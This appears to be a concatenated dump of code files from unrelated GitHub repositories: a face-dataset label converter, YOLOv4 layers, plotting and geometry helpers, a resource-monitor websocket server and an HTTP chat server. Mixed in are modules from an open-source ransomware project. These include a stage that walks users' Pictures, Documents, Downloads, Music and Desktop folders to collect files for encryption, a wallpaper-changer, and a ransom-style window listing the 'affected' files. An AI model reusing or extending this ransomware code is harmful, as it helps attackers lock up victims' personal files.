images_dir = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/convert/images"
labels_dir = "/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/convert/labels"
if not os.path.exists(annotation_dir):
os.mkdir(annotation_dir)
if not os.path.exists(labels_dir):
os.mkdir(labels_dir)
count = 1
for i in range(10):
annotation_path = os.path.join(annotation_dir, "FDDB-fold-%0*d-ellipseList.txt"%(2,i+1))
annotation_file = open(annotation_path)
while(True):
filename = annotation_file.readline()[:-1] + ".jpg"
if not filename:
break
line = annotation_file.readline()
if not line:
break
face_num=(int)(line)
count += 1
image = cv2.imread(os.path.join(origin_image_dir, filename))
filename = filename.replace('/', '_')
cv2.imwrite(os.path.join(images_dir, filename), image)
label_path = labels_dir + "/" + filename.replace('/','_')[:-3] + "txt"
label_file = open(label_path, 'w')
for k in range(face_num):
line = annotation_file.readline().strip().split()
major_axis_radius = (float)(line[0])
minor_axis_radius = (float)(line[1])
angle = (float)(line[2])
center_x = (float)(line[3])
center_y = (float)(line[4])
angle = angle / 3.1415926*180
mask = np.zeros((image.shape[0], image.shape[1]), dtype=np.uint8)
cv2.ellipse(mask, ((int)(center_x), (int)(center_y)), ((int)(major_axis_radius), (int)(minor_axis_radius)), angle, 0., 360., (255, 255, 255))
_, contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
for k in range(len(contours)):
r = cv2.boundingRect(contours[k])
xcenter = r[0] + r[2] / 2
ycenter = r[1] + r[3] / 2
labelline = "0" + " " + str(xcenter) + ' ' + str(ycenter) + ' ' + str(r[2]) + ' ' + str(r[3]) + '\n'
label_file.write(labelline)
label_file.close()
print(count)
if __name__ == '__main__':
#create_fddb_txt()
create_trainval_txt('/home/chenwei/HDD/Project/datasets/object_detection/FDDB2016/convert')
``` |
{
"source": "530824679/YOLOv4",
"score": 3
} |
#### File: YOLOv4/model/ops.py
```python
import tensorflow as tf
def mish(inputs):
"""
mish activation function.
mish(x) = x * tanh(softplus(x)) = x * tanh(ln(1 + e^{x}))
:param inputs: inputs data
:return: same shape as the input.
"""
with tf.variable_scope('mish'):
return inputs * tf.math.tanh(tf.math.softplus(inputs))
def leaky_relu(inputs, alpha):
"""
leaky relu activation function.
mish(x) = x * tanh(softplus(x)) = x * tanh(ln(1 + e^{x}))
:param inputs: inputs data
:return: same shape as the input.
"""
with tf.variable_scope('leaky_relu'):
f1 = 0.5 * (1 + alpha)
f2 = 0.5 * (1 - alpha)
return f1 * inputs + f2 * tf.abs(inputs)
def conv2d(inputs, filters_shape, trainable, downsample=False, activate='mish', bn=True, scope='conv2d'):
with tf.variable_scope(scope):
if downsample:
pad_h, pad_w = (filters_shape[0] - 2) // 2 + 1, (filters_shape[1] - 2) // 2 + 1
paddings = tf.constant([[0, 0], [pad_h, pad_h], [pad_w, pad_w], [0, 0]])
input_data = tf.pad(inputs, paddings, 'CONSTANT')
strides = (1, 2, 2, 1)
padding = 'VALID'
else:
strides = (1, 1, 1, 1)
padding = "SAME"
input_data = inputs
weight = tf.get_variable(name='weight', dtype=tf.float32, trainable=True, shape=filters_shape, initializer=tf.random_normal_initializer(stddev=0.01))
conv = tf.nn.conv2d(input=input_data, filter=weight, strides=strides, padding=padding, name=scope)
if bn:
conv = tf.layers.batch_normalization(conv, beta_initializer=tf.zeros_initializer(),
gamma_initializer=tf.ones_initializer(),
moving_mean_initializer=tf.zeros_initializer(),
moving_variance_initializer=tf.ones_initializer(), training=trainable)
else:
bias = tf.get_variable(name='bias', shape=filters_shape[-1], trainable=True, dtype=tf.float32, initializer=tf.constant_initializer(0.0))
conv = tf.nn.bias_add(conv, bias)
if activate == 'leaky':
conv = leaky_relu(conv, alpha=0.1)
elif activate == 'mish':
conv = mish(conv)
else:
return conv
return conv
def csp_block(inputs, trans_channels, res_channels, left_channels, right_channels, output_channels, iter_num, trainable, scope):
input_channels = inputs.get_shape().as_list()[3]
concat_channels = left_channels + right_channels
with tf.variable_scope(scope):
inputs_data = conv2d(inputs, filters_shape=(3, 3, input_channels, trans_channels), trainable=trainable, downsample=True, scope='in_conv')
short_cut = inputs_data
residual = residual_block(inputs_data, res_channels, iter_num, trainable, scope='residual_block')
inputs_left = conv2d(residual, filters_shape=(1, 1, res_channels, left_channels), trainable=trainable, scope='left_conv')
inputs_right = conv2d(short_cut, filters_shape=(1, 1, trans_channels, right_channels), trainable=trainable, scope='right_conv')
outputs = route(inputs_left, inputs_right, scope='concat')
outputs = conv2d(outputs, filters_shape=(1, 1, concat_channels, output_channels), trainable=trainable, scope='output_conv')
return outputs
def residual_block(inputs, output_channels, iter_num, trainable, scope):
input_channels = inputs.get_shape().as_list()[3]
with tf.variable_scope(scope):
inputs = conv2d(inputs, filters_shape=(1, 1, input_channels, output_channels), trainable=trainable, scope='conv')
short_cut = inputs
for i in range(iter_num):
inputs_data = conv2d(inputs, filters_shape=(1, 1, output_channels, output_channels), trainable=trainable, scope='conv_1_'+str(i))
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, output_channels, output_channels), trainable=trainable, scope='conv_2_'+str(i))
outputs = tf.add(inputs_data, short_cut)
return outputs
def spp_block(inputs, filter_num1=512, filter_num2=1024, trainable=True, scope='spp_block'):
input_channels = inputs.get_shape().as_list()[3]
with tf.variable_scope(scope):
inputs_data = conv2d(inputs, filters_shape=(1, 1, input_channels, filter_num1), trainable=trainable, activate='leaky', scope='conv_1')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_2')
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_3')
spp = spatial_pyramid_pooling(inputs_data, 5, 9, 13, scope='spp')
inputs_data = conv2d(spp, filters_shape=(1, 1, filter_num1 * 4, filter_num1), trainable=trainable, activate='leaky',scope='conv_4')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky',scope='conv_5')
outputs = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky',scope='conv_6')
return outputs
def spatial_pyramid_pooling(inputs, pool_size_1, pool_size_2, pool_size_3, scope):
with tf.variable_scope(scope):
pool_1 = maxpool(inputs, pool_size_1, stride=1, scope='pool_1')
pool_2 = maxpool(inputs, pool_size_2, stride=1, scope='pool_2')
pool_3 = maxpool(inputs, pool_size_3, stride=1, scope='pool_3')
outputs = tf.concat([pool_1, pool_2, pool_3, inputs], axis=-1)
return outputs
def maxpool(inputs, size=2, stride=2, scope='maxpool'):
with tf.variable_scope(scope):
pool = tf.layers.max_pooling2d(inputs, pool_size=size, strides=stride, padding='SAME')
return pool
def route(previous_output, current_output, scope='concat'):
with tf.variable_scope(scope):
outputs = tf.concat([current_output, previous_output], axis=-1)
return outputs
def upsample_block(inputs_1, inputs_2, filter_num1, filter_num2, trainable=True, scope='upsample_block'):
input_channels_1 = inputs_1.get_shape().as_list()[3]
input_channels_2 = inputs_2.get_shape().as_list()[3]
input_channels = filter_num1 + filter_num1
with tf.variable_scope(scope):
inputs_data_1 = conv2d(inputs_1, filters_shape=(1, 1, input_channels_1, filter_num1), trainable=trainable, activate='leaky', scope='conv_1')
inputs_data_2 = conv2d(inputs_2, filters_shape=(1, 1, input_channels_2, filter_num1), trainable=trainable, activate='leaky', scope='conv_2')
inputs_data_2 = upsample(inputs_data_2, "resize")
inputs_data = route(inputs_data_1, inputs_data_2)
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, input_channels, filter_num1), trainable=trainable, activate='leaky', scope='conv_3')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_4')
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_5')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_6')
outputs = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_7')
return outputs
def upsample(inputs, method="deconv", scope="upsample"):
assert method in ["resize", "deconv"]
if method == "resize":
with tf.variable_scope(scope):
input_shape = tf.shape(inputs)
outputs = tf.image.resize_nearest_neighbor(inputs, (input_shape[1] * 2, input_shape[2] * 2))
if method == "deconv":
numm_filter = inputs.shape.as_list()[-1]
outputs = tf.layers.conv2d_transpose(inputs, numm_filter, kernel_size=2, padding='same', strides=(2,2), kernel_initializer=tf.random_normal_initializer())
return outputs
def downsample_block(inputs_1, inputs_2, filter_num1, filter_num2, trainable=True, scope='downsample_block'):
input_channels_1 = inputs_1.get_shape().as_list()[3]
input_channels_2 = inputs_2.get_shape().as_list()[3]
input_channels = filter_num1 + input_channels_2
with tf.variable_scope(scope):
inputs_data_1 = conv2d(inputs_1, filters_shape=(3, 3, input_channels_1, filter_num1), trainable=trainable, downsample=True, activate='leaky', scope='conv_1')
inputs_data = route(inputs_data_1, inputs_2)
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, input_channels, filter_num1), trainable=trainable, activate='leaky', scope='conv_2')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_3')
inputs_data = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_4')
inputs_data = conv2d(inputs_data, filters_shape=(3, 3, filter_num1, filter_num2), trainable=trainable, activate='leaky', scope='conv_5')
outputs = conv2d(inputs_data, filters_shape=(1, 1, filter_num2, filter_num1), trainable=trainable, activate='leaky', scope='conv_6')
return outputs
```
#### File: YOLOv4/utils/visualize.py
```python
import cv2
import numpy as np
def calculate_angle(im, re):
"""
param: im(float): imaginary parts of the plural
param: re(float): real parts of the plural
return: The angle at which the objects rotate
around the Z axis in the lidar coordinate system
"""
if re > 0:
return np.arctan(im / re)
elif im < 0:
return -np.pi + np.arctan(im / re)
else:
return np.pi + np.arctan(im / re)
def draw_rotated_box(img, cy, cx, w, h, angle, color):
"""
param: img(array): RGB image
param: cy(int, float): Here cy is cx in the image coordinate system
param: cx(int, float): Here cx is cy in the image coordinate system
param: w(int, float): box's width
param: h(int, float): box's height
param: angle(float): rz
param: color(tuple, list): the color of box, (R, G, B)
"""
left = int(cy - w / 2)
top = int(cx - h / 2)
right = int(cx + h / 2)
bottom = int(cy + h / 2)
ro = np.sqrt(pow(left - cy, 2) + pow(top - cx, 2))
a1 = np.arctan((w / 2) / (h / 2))
a2 = -np.arctan((w / 2) / (h / 2))
a3 = -np.pi + a1
a4 = np.pi - a1
rotated_p1_y = cy + int(ro * np.sin(angle + a1))
rotated_p1_x = cx + int(ro * np.cos(angle + a1))
rotated_p2_y = cy + int(ro * np.sin(angle + a2))
rotated_p2_x = cx + int(ro * np.cos(angle + a2))
rotated_p3_y = cy + int(ro * np.sin(angle + a3))
rotated_p3_x = cx + int(ro * np.cos(angle + a3))
rotated_p4_y = cy + int(ro * np.sin(angle + a4))
rotated_p4_x = cx + int(ro * np.cos(angle + a4))
center_p1p2y = int((rotated_p1_y + rotated_p2_y) * 0.5)
center_p1p2x = int((rotated_p1_x + rotated_p2_x) * 0.5)
cv2.line(img, (rotated_p1_y, rotated_p1_x), (rotated_p2_y, rotated_p2_x),
color, 1)
cv2.line(img, (rotated_p2_y, rotated_p2_x), (rotated_p3_y, rotated_p3_x),
color, 1)
cv2.line(img, (rotated_p3_y, rotated_p3_x), (rotated_p4_y, rotated_p4_x),
color, 1)
cv2.line(img, (rotated_p4_y, rotated_p4_x), (rotated_p1_y, rotated_p1_x),
color, 1)
cv2.line(img, (center_p1p2y, center_p1p2x), (cy, cx), color, 1)
``` |
{
"source": "530tatted530/nekros",
"score": 3
} |
#### File: Ransomeware/after_stage1/changeWallpaper.py
```python
import ctypes, os, time, random
#=================================================================#
# Author : <NAME> | Website : https://technowlogy.tk #
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# Python Module to Change Windows Wallpaper in Every Given Time #
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# Mainly Developed for Open-Source Ransomeware project #
#=================================================================#
class ChangeWallpaper:
def __init__(self, directory=None):
if directory == None:
self.directory = os.getcwd().replace("\\", "\\\\") + "\\\\"
self.path = ''
else:
self.directory = os.getcwd() + "\\" + directory
self.path = "./" + directory + "/"
def time_to_change_wallpaper(self, seconds=10):
"""
Function Changes wallpaper after every Given time in seconds
Params : time [In Seconds]
"""
while True:
img_list = self.list_all_img()
img = self.random_img_selector(img_list)
self.change_wallpaper(self.path + img)
print(f"[*] Changing wallpaper again after {seconds} Seconds")
time.sleep(seconds)
def locate_images(self):
list_of_all_files = []
for root, _, files in os.walk(self.directory):
for f in files:
list_of_all_files.append(f)
return list_of_all_files
def list_all_img(self):
"""Function to return a list of image file in current working direcotry"""
img_list = []
img_extension = ['jpg', 'jpeg', 'png']
file_list = self.locate_images()
for img in file_list:
a = len(img)
b = a - 3
if img[b:a] in img_extension:
img_list.append(img)
return img_list
def random_img_selector(self, img):
"""Selects random Image from a given Image List"""
img_list = img
total_files = len(img_list)
random_number = random.randint(0, total_files-1)
img_selected = img[random_number]
return img_selected
def change_wallpaper(self, img):
"""
Function to Change wallper [MAIN Function]
Params : Image Path
"""
img_path = os.getcwd() + "\\" +img
print("\n[*] Changing Wallpaper ...")
ctypes.windll.user32.SystemParametersInfoW(20, 0, img_path, 0)
print("[+] Wallpaper Changed Successfully!")
if __name__ == '__main__':
change_wallpaper = ChangeWallpaper()
change_wallpaper.time_to_change_wallpaper(10)
```
#### File: Ransomeware/after_stage2/check_log_gui.py
```python
import sys
try:
import Tkinter as tk
from Tkinter import messagebox
except ImportError:
import tkinter as tk
from tkinter import messagebox
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
from PIL import Image, ImageTk
import os
def start_gui():
'''Starting point when module is the main routine.'''
global prog_location, root
prog_call = sys.argv[0]
prog_location = os.path.split(prog_call)[0]
root = tk.Toplevel()
top = CheckLog(root)
top.add_log_data_to_listbox()
root.mainloop()
def destroy_this_window():
global root
root.destroy()
class CheckLog:
def __init__(self, top=None):
'''This class configures and populates the toplevel window.
top is the toplevel containing window.'''
_bgcolor = '#d9d9d9' # X11 color: 'gray85'
_fgcolor = '#000000' # X11 color: 'black'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # X11 color: 'gray85'
_ana2color = '#ececec' # Closest X11 color: 'gray92'
font10 = "-family {Segoe UI} -size 14 -weight bold -slant " \
"roman -underline 0 -overstrike 0"
self.style = ttk.Style()
if sys.platform == "win32":
self.style.theme_use('winnative')
self.style.configure('.',background=_bgcolor)
self.style.configure('.',foreground=_fgcolor)
self.style.map('.',background=
[('selected', _compcolor), ('active',_ana2color)])
top.geometry("600x450+413+160")
icon_location = ImageTk.PhotoImage(file=os.path.join(prog_location,"img/lock.ico"))
top.tk.call('wm', 'iconphoto', top._w, icon_location)
top.resizable(0, 0)
top.title("Check Encrypted Files Log Window")
top.configure(background="#ff0000")
self.Scrolledlistbox1 = ScrolledListBox(top)
self.Scrolledlistbox1.place(relx=0.012, rely=0.111, relheight=0.878
, relwidth=0.968)
self.Scrolledlistbox1.configure(background="white")
self.Scrolledlistbox1.configure(disabledforeground="#a3a3a3")
self.Scrolledlistbox1.configure(font="TkFixedFont")
self.Scrolledlistbox1.configure(foreground="black")
self.Scrolledlistbox1.configure(highlightbackground="#d9d9d9")
self.Scrolledlistbox1.configure(highlightcolor="#d9d9d9")
self.Scrolledlistbox1.configure(selectbackground="#c4c4c4")
self.Scrolledlistbox1.configure(selectforeground="black")
self.Label1 = tk.Label(top)
self.Label1.place(relx=0.008, rely=0.011, height=41, width=584)
self.Label1.configure(background="#ff0000")
self.Label1.configure(disabledforeground="#a3a3a3")
self.Label1.configure(font=font10)
self.Label1.configure(foreground="#ffff79")
self.Label1.configure(text='''These Are The Files Which Are Affected By This Ransomeware!!!''')
def add_log_data_to_listbox(self):
log_list = []
try:
with open('log.txt', 'r') as f:
for file in f.readlines():
log_list.append(file)
except Exception:
destroy_this_window()
messagebox.showerror('404 File Not Found : (', 'You Might Deleted \"log.txt\", which contains\nlist of files which gets encrypted!')
for file in log_list:
self.Scrolledlistbox1.insert(tk.END, file)
# The following code is added to facilitate the Scrolled widgets
class AutoScroll(object):
'''Configure the scrollbars for a widget.'''
def __init__(self, master):
try:
vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview)
except:
pass
hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview)
try:
self.configure(yscrollcommand=self._autoscroll(vsb))
except:
pass
self.configure(xscrollcommand=self._autoscroll(hsb))
self.grid(column=0, row=0, sticky='nsew')
try:
vsb.grid(column=1, row=0, sticky='ns')
except:
pass
hsb.grid(column=0, row=1, sticky='ew')
master.grid_columnconfigure(0, weight=1)
master.grid_rowconfigure(0, weight=1)
if py3:
methods = tk.Pack.__dict__.keys() | tk.Grid.__dict__.keys() \
| tk.Place.__dict__.keys()
else:
methods = tk.Pack.__dict__.keys() + tk.Grid.__dict__.keys() \
+ tk.Place.__dict__.keys()
for meth in methods:
if meth[0] != '_' and meth not in ('config', 'configure'):
setattr(self, meth, getattr(master, meth))
@staticmethod
def _autoscroll(sbar):
'''Hide and show scrollbar as needed.'''
def wrapped(first, last):
first, last = float(first), float(last)
if first <= 0 and last >= 1:
sbar.grid_remove()
else:
sbar.grid()
sbar.set(first, last)
return wrapped
def __str__(self):
return str(self.master)
def _create_container(func):
'''Creates a ttk Frame with a given master, and use this new frame to
place the scrollbars and the widget.'''
def wrapped(cls, master, **kw):
container = ttk.Frame(master)
container.bind('<Enter>', lambda e: _bound_to_mousewheel(e, container))
container.bind('<Leave>', lambda e: _unbound_to_mousewheel(e, container))
return func(cls, container, **kw)
return wrapped
class ScrolledListBox(AutoScroll, tk.Listbox):
'''A standard Tkinter Listbox widget with scrollbars that will
automatically show/hide as needed.'''
@_create_container
def __init__(self, master, **kw):
tk.Listbox.__init__(self, master, **kw)
AutoScroll.__init__(self, master)
def size_(self):
sz = tk.Listbox.size(self)
return sz
import platform
def _bound_to_mousewheel(event, widget):
child = widget.winfo_children()[0]
if platform.system() == 'Windows' or platform.system() == 'Darwin':
child.bind_all('<MouseWheel>', lambda e: _on_mousewheel(e, child))
child.bind_all('<Shift-MouseWheel>', lambda e: _on_shiftmouse(e, child))
else:
child.bind_all('<Button-4>', lambda e: _on_mousewheel(e, child))
child.bind_all('<Button-5>', lambda e: _on_mousewheel(e, child))
child.bind_all('<Shift-Button-4>', lambda e: _on_shiftmouse(e, child))
child.bind_all('<Shift-Button-5>', lambda e: _on_shiftmouse(e, child))
def _unbound_to_mousewheel(event, widget):
if platform.system() == 'Windows' or platform.system() == 'Darwin':
widget.unbind_all('<MouseWheel>')
widget.unbind_all('<Shift-MouseWheel>')
else:
widget.unbind_all('<Button-4>')
widget.unbind_all('<Button-5>')
widget.unbind_all('<Shift-Button-4>')
widget.unbind_all('<Shift-Button-5>')
def _on_mousewheel(event, widget):
if platform.system() == 'Windows':
widget.yview_scroll(-1*int(event.delta/120),'units')
elif platform.system() == 'Darwin':
widget.yview_scroll(-1*int(event.delta),'units')
else:
if event.num == 4:
widget.yview_scroll(-1, 'units')
elif event.num == 5:
widget.yview_scroll(1, 'units')
def _on_shiftmouse(event, widget):
if platform.system() == 'Windows':
widget.xview_scroll(-1*int(event.delta/120), 'units')
elif platform.system() == 'Darwin':
widget.xview_scroll(-1*int(event.delta), 'units')
else:
if event.num == 4:
widget.xview_scroll(-1, 'units')
elif event.num == 5:
widget.xview_scroll(1, 'units')
if __name__ == '__main__':
start_gui()
```
#### File: nekros/Ransomeware/stage2.py
```python
import os, time
import threading #Using Threads to Boost Search Process BY Searching Diff. Drive on Diff. Thread
from os.path import expanduser
from pathlib import Path #Used to Find the Home Path
import configparser, ast #Used to Retrive Settings from config.txt
#Stage2 is Initiated By (Stage2 Class), which depends on (LocateTargetFiles Class)
class Stage2:
def __init__(self):
self.list_of_files = []
def start(self):
home = self.get_home_dir()
target1 = home + "Pictures"
target2 = home + "Music"
target3 = home + "Downloads"
target4 = home + "Documents"
target5 = home + "Desktop"
t1 = threading.Thread(target=self.run_locate_class, args=[target1,])
t2 = threading.Thread(target=self.run_locate_class, args=[target2,])
t3 = threading.Thread(target=self.run_locate_class, args=[target3,])
t4 = threading.Thread(target=self.run_locate_class, args=[target4,])
t5 = threading.Thread(target=self.run_locate_class, args=[target5,])
t1.start()
t1.join()
t2.start()
t2.join()
t3.start()
t3.join()
t4.start()
t4.join()
t5.start()
t5.join()
with open('log.txt' , 'w') as f:
for files in self.list_of_files:
f.write(files+'\n')
return self.list_of_files
def get_home_dir(self):
return str(Path.home()) + '\\'
def run_locate_class(self, drive_name):
'''
Function to make Object of LocateTargetFiles Class
'''
starting = LocateTargetFiles()
list_of_files = starting.start(drive_name)
self.list_of_files.extend(list_of_files)
return True
class LocateTargetFiles:
def __init__(self, exclude = None):
self.files_on_system = []
config = configparser.RawConfigParser()
config.read('config.txt')
self.target_extension = ast.literal_eval(config.get("TARGET_EXTENSIONS", "list1")) #Retriving From config.txt
self.exclude_dir = ast.literal_eval(config.get("EXCLUDED_DIRECTORY", "list1")) #Retriving From config.txt
if exclude != None:
self.exclude_dir.extend(exclude)
def start(self, root_dir):
self.locate_files(root_dir)
return self.files_on_system
def locate_files(self, root_dir):
for root, _, files in os.walk(root_dir):
for f in files:
abs_file_path = os.path.join(root, f)
self.filter(self.target_extension, abs_file_path)
def filter(self, target_extension, abs_file_path):
if self.is_excluded_dir(abs_file_path) == False:
# Filtering Files On the basics of file extension
if abs_file_path.split('.')[-1] in self.target_extension and abs_file_path.split('\\')[-1] != 'log.txt':
self.files_on_system.append(abs_file_path)
else:
pass
def is_excluded_dir(self, path):
'''
@summary: Checks whether the specified path should be excluded from encryption
@param path: The path to check
@return: True if the path should be excluded from encryption, otherwise False
'''
for dir_to_exclude in self.exclude_dir:
lenght = len(dir_to_exclude)
if path[:lenght] == dir_to_exclude:
return True
return False
if __name__ == '__main__':
test = Stage2()
list_of_files = test.start()
print(f"[+] Total Number of Files : {len(list_of_files)}\n")
time.sleep(4)
for file in list_of_files:
print(file)
'''
#Testing Class == LocateTargetFiles
absolue_path = input("Enter Absolute Path : ")
exclude_dir = ['C:\\Users\\sat<NAME>\\Desktop\\Ransomeware\\2',]
test = LocateTargetFiles(exclude_dir)
files_on_system = test.start(absolue_path)
for file in files_on_system:
print(file)
'''
``` |
{
"source": "531464049/PythonLearning",
"score": 3
} |
#### File: PythonLearning/test/Rectangle.py
```python
class Rectangle(object):
def __init__(self):
self.width = 0
self.height = 0
def set_size(self, size):
self.width, self.height = size
def get_size(self):
return self.width, self.height
size = property(get_size, set_size)
``` |
{
"source": "534ttl3/ctsutils",
"score": 3
} |
#### File: ctsutils/ctsutils/euler_angles.py
```python
import math
import numpy as np
# ---- convention for accessing all 4 pi sr by just two angles, theta and phi ----
def gamma_convention():
return 0
def beta_convention(theta):
return -np.pi/2 + theta # theta \in [0, pi]
def alpha_convention(phi):
return phi # phi \in [0, 2*pi]
# ----
def get_zxz_rot(alpha, beta, gamma):
"""
calculate active rotation R_z(gamma) R_x(beta) R_z(alpha)
think like this: the application is in the reverse order,
and the order of arguments is the order of application,
so, again reversed!
and the index namings can also be flipped around without change
"""
return np.einsum("ij,jk",
np.einsum("ij,jk", get_R_z(alpha), get_R_x(beta)),
get_R_z(gamma))
# return np.dot(get_R_x(beta), get_R_z(alpha))
# return np.dot(get_R_z(gamma), np.dot(get_R_x(beta), get_R_z(alpha))) # this produces the wrong result
# import ipdb; ipdb.set_trace() # noqa BREAKPOINT
# return np.einsum("ij,jk,kl", get_R_z(alpha), get_R_x(beta), get_R_z(gamma))
def get_R_x(angle):
return np.array([[1, 0, 0],
[0, math.cos(angle), -math.sin(angle)],
[0, math.sin(angle), math.cos(angle)]])
def get_R_y(angle):
return np.array([[math.cos(angle), 0, math.sin(angle)],
[0, 1, 0],
[-math.sin(angle), 0, math.cos(angle)]])
def get_R_z(angle):
# import ipdb; ipdb.set_trace() # noqa BREAKPOINT
return np.array([[math.cos(angle), -math.sin(angle), 0],
[math.sin(angle), math.cos(angle), 0],
[0, 0, 1]])
```
#### File: ctsutils/ctsutils/mpl_slider_pcolor.py
```python
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button, RadioButtons
fig, ax = plt.subplots()
plt.subplots_adjust(left=0.25, bottom=0.25)
x = np.linspace(-3, 3, 51)
y = np.linspace(-2, 2, 41)
y2 = np.linspace(-1, 1, 31)
X, Y, Y2 = np.meshgrid(x, y, y2, indexing="ij")
Z = (1 - X/2 + X**5 + (Y+Y2)**3) * np.exp(-X**2 -
(Y+Y2)**2) # calcul du tableau des valeurs de Z
plot = ax.pcolor(X[:, 5, :], Y2[:, 5, :], Z[:, 5, :] # , shading="auto"
)
axfreq = plt.axes([0.25, 0.1, 0.65, 0.03])
sfreq = Slider(axfreq, 'Freq', 0., 50., valinit=0., valstep=1.)
def update(val):
print(val)
idx = int(val)
ax.pcolor(X[:, idx, :], Y2[:, idx, :], Z[:, idx, :] # , shading="auto"
)
sfreq.on_changed(update)
plt.show()
``` |
{
"source": "536/python-websocket-echarts-resource-monitor",
"score": 3
} |
#### File: 536/python-websocket-echarts-resource-monitor/server.py
```python
import asyncio
import json
import time
import psutil
import websockets
interval = 3 # update every 3s
async def analysis(websocket):
while websocket.open:
data = {
"code": 0,
"msg": "",
"result": {
"time": time.strftime('%M:%S'),
"memory": psutil.virtual_memory().percent,
"cpu": psutil.cpu_percent(),
}
}
print(data)
await websocket.send(json.dumps(data))
await asyncio.sleep(interval)
print('closed')
async def main(host='localhost', port=5768):
async with websockets.serve(analysis, host, port):
await asyncio.Future()
if __name__ == '__main__':
asyncio.run(main())
``` |
{
"source": "53jk1/Network-communication",
"score": 3
} |
#### File: 53jk1/Network-communication/httpchat.py
```python
import json
import os
import socket
import sys
from threading import Event, Lock, Thread
DEBUG = False # Changing to True displays additional messages.
# Implementation of website logic.
class SimpleChatWWW():
def __init__(self, the_end):
self.the_end = the_end
self.files = "." # For example, the files may be in your working directory.
self.file_cache = {}
self.file_cache_lock = Lock()
self.messages = []
self.messages_offset = 0
self.messages_lock = Lock()
self.messages_limit = 1000 # Maximum number of stored messages.
# Mapping web addresses to handlers.
self.handlers = {
('GET', '/'): self.__handle_GET_index,
('GET', 'index.html'): self.__handle_GET_index,
('GET', '/style.css'): self.__handle_GET_style,
('GET', '/main.js'): self.__handle_GET_javascript,
('POST', '/chat'): self.__handle_POST_chat,
('POST', '/messages'): self.__handle_POST_messages,
}
def handle_http_request(self, req):
req_query = (req['method'], req['query'])
if req_query not in self.handlers:
return { 'status': (404, 'Not Found') }
return self.handlers[req_query](req)
def __handle_GET_index(self, req):
return self.__send_file('httpchat_index.html')
def __handle_GET_style(self, req):
return self.__send_file('httpchat_style.css')
def __handle_GET_javascript(self, req):
return self.__send_file('httpchat_main.js')
def __handle_POST_chat(self, req):
# Read the needed fields from the received JSON object.
# It is safe not to make any assumptions about the content and
# type of data being transferred.
try:
obj = json.loads(req['data'])
except ValueError:
return { 'status': (400, 'Bad Request') }
if type(obj) is not dict or 'text' not in obj:
return { 'status': (400, 'Bad Request') }
text = obj['text']
if type(text) is not str and type(text) is not unicode:
return { 'status': (400, 'Bad Request') }
sender_ip = req['client_ip']
# Add a message to the list.
# If the list is longer than the limit,
# remove one message in front and increase the offset.
with self.messages_lock:
if len(self.messages) > self.messages_limit:
self.messages.pop(0)
self.messages_offset += 1
self.messages.append((sender_ip, text))
sys.stdout.write("[ INFO ] <%s> %s\n" % (sender_ip, text))
return { 'status': (200, 'OK') }
def __handle_POST_messages(self, req):
# Read the needed fields from the received JSON object.
# It is safe not to make any assumptions about the content and type of data being transferred.
try:
obj = json.loads(req['data'])
except ValueError:
return { 'status': (400, 'Bad Request') }
if type(obj) is not dict or 'last_message_id' not in obj:
return { 'status': (400, 'Bad Request') }
last_message_id = obj['last_message_id']
if type(last_message_id) is not int:
return { 'status': (400, 'Bad Request') }
# Copy all messages, starting with last_message_id.
with self.messages_lock:
last_message_id -= self.messages_offset
if last_message_id < 0:
last_message_id = 0
messages = self.messages[last_message_id:]
new_last_message_id = self.messages_offset + len(self.messages)
# Generate a response.
data = json.dumps({
"last_message_id": new_last_message_id,
"messages": messages
})
return {
'status': (200, 'OK'),
'headers': [
('Content-Type', 'application/json;charset=utf-8'),
],
'data': data
}
# Creating a response containing the contents of the file on the disk.
# In practice, the method below additionally tries to cache files and read
# them only if they have not already been loaded or if the file has changed
# in the meantime.
def __send_file(self, fname):
# Determine the file type based on its extension.
ext = os.path.splitext(fname)[1]
mime_type = {
'.html': 'text/html;charset=utf-8',
'.js': 'application/javascript;charset=utf-8',
'.css': 'text/css;charset=utf-8',
}.get(ext.lower(), 'application/octet-stream')
# Check when the file was last modified.
try:
mtime = os.stat(fname).st_mtime
except:
# Unfortunately, CPython on Windows throws an exception class that is not declared under GNU/Linux.
# The easiest way is to catch all exceptions, although this is definitely an inelegant solution.
# The file probably does not exist or cannot be accessed.
return { 'status': (404, 'Not Found') }
# Check if the file is in the cache.
with self.file_cache_lock:
if fname in self.file_cache and self.file_cache[fname][0] == mtime:
return {
'status': (200, 'OK'),
'headers': [
('Content-Type', mime_type),
],
'data': self.file_cache[fname][1]
}
# As a last resort, load the file.
try:
with open(fname, 'rb') as f:
data = f.read()
mtime = os.fstat(f.fileno()).st_mtime # Update the mime.
